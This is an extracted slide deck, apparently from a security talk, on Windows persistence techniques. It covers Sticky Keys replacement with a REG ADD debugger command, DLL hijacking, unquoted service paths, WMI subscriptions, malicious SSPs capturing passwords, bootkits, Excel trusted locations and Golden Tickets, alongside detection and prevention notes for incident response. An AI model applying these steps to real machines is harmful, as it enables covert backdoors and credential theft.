● Bounce the box (if required).
44. Sticky Keys
● With administrative access to a machine,
you can easily setup sticky keys.
○ Make a copy of sethc.exe
○ Copy cmd.exe to C:windows
system32sethc.exe
○ Reboot, and hit shift 5 times!
45.
46. Sticky Keys
● Another method, setting cmd.exe as the
Debugger for sethc.exe.
○ REG ADD "HKLMSOFTWAREMicrosoftWindows NT
CurrentVersionImage File Execution Options
sethc.exe" /v Debugger /t REG_SZ /d "C:windows
system32cmd.exe"
h"p://carnal0wnage.a"ackresearch.com/2012/04/privilege-escalaAon-via-sAcky-keys.html?
showComment=1335891005473#c7632690272609583721
47. Sticky Keys
● Main problem, is it doesn’t require
authentication.
○ If using a shell
● So if this is used, ensure that you use a
callback that only connects to you, etc.
48. Sticky Keys
● Detection:
○ Compare the sethc.exe binary hash with
the known good sethc.exe
○ Ensure sethc.exe doesn’t have a
debugger setup that triggers a different
binary.
50. DLL Search Order Hijack
● Search order hijacking exploits how
Windows searches for dlls when loading an
executable.
○ Specifically, it exploits the fact that
Windows will search the same folder the
binary is stored in for a dll first*
51. DLL Search Order Hijack
● Old sample in CAPEC
○ If you drop ntshrui.dll within C:Windows
and run explorer.exe, you can get the dll
within C:Windows to be executed
● This exploits the order in which the dll is
searched for on a Windows system
52. DLL Search Order Hijack
● Attackers create malicious DLLs that
exploit this search order to get their DLL
to run on a system.
● Since it’s every time the application runs,
it can be used as a persistence technique.
● PowerUp can be used to find these
opportunities
53. DLL Search Order Hijack
● Used by the following actors
○ APT 1, APT 8, APT 17, APT 19, APT 22,
APT 26
● Used by the following malware
○ AMISHARP, GH0ST, HOMEUNIX, POISON
IVY, VIPER
54. Legit Scheduled Tasks
● Easy to identify scheduled
tasks named “evilTask” or
anomalous tasks
● First we must look at how
investigators detect
malicious scheduled tasks:
55. Legit Scheduled Tasks
○ Stacking tasks accross
multiple systems to
determine anomalous
tasks
○ Parse task scheduler log
(schedLgu.txt)
56. Legit Scheduled Tasks
● What if we modify existing
legit scheduled tasks?
○ Specifically tasks that are
not required for Windows
functionality
57. Unquoted Service Path
● Unquoted service paths exploit a
vulnerability in the order that Windows
searches for a binary when a space is in an
unquoted path.
○ C:Program Files(x86)SteamSteam
Gamingsteam.exe
58. Unquoted Service Path
● C:Program Files(x86)SteamSteam
Gamingsteam.exe
○ C:Program.exe
○ C:Program Files(x86)SteamSteam.exe
○ C:Program Files(x86)SteamSteam
Gamingsteam.exe
● We have three opportunities here!
59. Unquoted Service Path
● If we have write access to any of the
paths that Windows looks for, we can
hijack the service.
○ Just need a service binary again (J)
● Drop it into any of the paths on the
previous slide, and restart the service!
○ Might have to wait for a restart
60. Unquoted Service Path
● Prevention
○ Check service binaries on your images
and determine if any are using unquoted
service paths.
○ Make sure the paths aren’t writable to
non-admins.
○ PowerUp can find these as well
61. WMI
● Three requirements necessary to invoke a
permanent WMI event subscriber:
1. An Event Filter
2. An Event Consumer
3. A Filter/Consumer Binding
Original research performed by Matt Graeber released in “Practical Persistence
with PowerShell” presentation
62. Event Filters
● The WMI query that fires upon an event
occurring - usually, an event class derived
from __InstanceModificationEvent,
__InstanceCreationEvent, or
__InstanceDeletionEvent
Original research performed by Matt Graeber released in “Practical Persistence
with PowerShell” presentation
63. Event Consumers
Original research performed by Matt Graeber released in “Practical Persistence
with PowerShell” presentation
● There are five different types of Event
consumers
● We’re specifically interested in the
“CommandLineEventConsumer”
64. Filter/Consumer Binding
● This associates the event filter with the
event consumer
Original research performed by Matt Graeber released in “Practical Persistence
with PowerShell” presentation
65. WMI
● PowerSploit’s Persistence Module for WMI
○ Automates the process
○ Will create a permanent WMI event
subscription
● Can use Out-EncodedCommand (in
PowerSploit) to get one liner
66. PowerShell Profiles
● Use standard persistence mechanism to
execute PowerShell silently
○ "C:Windows
System32WindowsPowerShell
v1.0powershell.exe" -NonInteractive -
WindowStyle Hidden
○ It’s a legit exe!
68. PowerShell Profiles
● Anytime PowerShell executes, it will
execute code in the default profile.
● Create profile here
○ C:Windows
System32WindowsPowerShell
v1.0profile.ps1
69. Security Support Provider
● A security support provider (SSP) - like a
security package
○ A user-mode secuirty extension used
to perform authentication during a
client/server exchange.
Original research performed by Matt Graeber released at MIRcon 2014
70. Security Support Provider
● An authentication package (AP)
○ Used to extend interactive login
authentication
○ Example: Enable RSA token
authentication
Original research performed by Matt Graeber released at MIRcon 2014
71. Security Support Provider
● SSP/AP
○ Can serve tasks of SSPs and APs.
loaded into lsass at boot.
○ Example: Kerberos and msv1_0
(NTLM)
Original research performed by Matt Graeber released at MIRcon 2014
72. Security Support Provider
● You can install your own SSP that will be
loaded into lsass.exe.
○ No need for injection
● Can develop your own SSP DLL
○ Required export: SpLsaModeInitialize
Original research performed by Matt Graeber released at MIRcon 2014
73. Security Support Provider
● Use Persistence.psm1 PowerSploit module to
install your malcious SSP
● Benjamin Delpy (@gentilkiwi) added SSP
functionality to mimilib.dll.
○ Once installed and loaded into lsass.exe, it
captures plaintext passwords.
○ This is acheived with the SpAcceptCredential
callback function.
Original research performed by Matt Graeber released at MIRcon 2014
74. Malicious SSP Poc - mimilib
Image taken from “Analysis of Malicious SSP” - MIRcon 2014
76. Bootkit
● A “bootkit” is a program that can alter the
Master Boot Record (MBR) or Virtual Boot
Record (VBR) so that malicious code is
executed before the operating system is
loaded.
● Moves the original MBR to a different
location and places itself at the beginning
of the drive.
77. Bootkit
○ Upon boot, a bootkit will modify a
service to point to a modfied DLL on
disk.
○ Service DLL is responsible for
executing backdoor payload.
79. But How Does It Work?
● Malcious MBR: Windows BIOS loads the
modified MBR, which then loads the code
in stage 2.
● Initial Loader: Loads the stage 3 code that
was previously stored as a file on disk
and in unallocated space.
80. But How Does It Work?
● Secondary Loader: Loads code that
enables the installation and configuration
of backdoor. The service hijacking phase.
● Backdoor Loader: Loads the backdoor
from disk. Also the replaces hijacked
service back to original form.
81. But How Does It Work?
Simplied MBR bootkit execution taken from Mtrends 2016
82. Excel Magic
● Malicious macro executes backdoor
● Ways you an ensure persistence?
○ Most people will execute Excel at least
once a day
○ So why not leverage this as a
persistence technique?
83. Excel Magic
○ You can use “old way” persistence
techniques to execute Excel at startup
- that is a legit program!
○ Disable macro security settings so
workbook executes without prompt
84.
85. Excel Magic
● Registry modification that executes
specific Excel workbook upon Excel start
○ HKEY_CURRENT_USERSoftware
MicrosoftOffice12.0ExcelSecurity
Trusted Locations
○ Add location
89. Golden Ticket
● This method came out due to Benjamin
Delpy working with Sean Metcalf.
● This forges a golden ticket which can be
good for 10 years!
● Golden tickets can provide on-demand
domain privilege “upgrades” for any group
within a domain.
90. Golden Ticket
● You only need four pieces of information:
○ Domain SID
○ The name of the domain
○ User you want to create the hash for
○ krbtgt account hash
● You can build it offline, right at home
94. Golden Ticket
● Key takeaways:
○ If impersonating a real user, even if pass
is changed, this still works
○ Valid for as long as you specify (10 year
default)
○ Only way to stop is change krbtgt hash…
twice.. Or rebuild from bare metal :)
95. Account Checkout?
● Case Study:
○ Client has account checkout system for domain
administrator (DA) accounts.
○ Only two users have access to that system
○ System requires 2FA.
○ You can lose DA access if the user changes his
password, pin, or token.
○ User can see what accounts he checked out
(could get caught!)
96. Account Checkout?
● We need to persist domain administrator
without getting caught.
○ If we keep checking out accounts with the
user we have, he might see that he has
accounts checked out that he didn’t
check out.
98. Account Checkout?
● Password Vault permissions were managed
through Active Directory Groups...TONS of
them.
○ Copy group memberships to a compromised
user who doesn’t use PasswordVault
■ Note: All changes were well documented
to revert
100. Conclusion
● Malware persistence will remain rampant.
There will always be new and creative
ways for maintaining persistence.
● Understanding malware persistence
techniques is critical as it serves as a
focal point for incident response
investigations and help drive successful
remediation.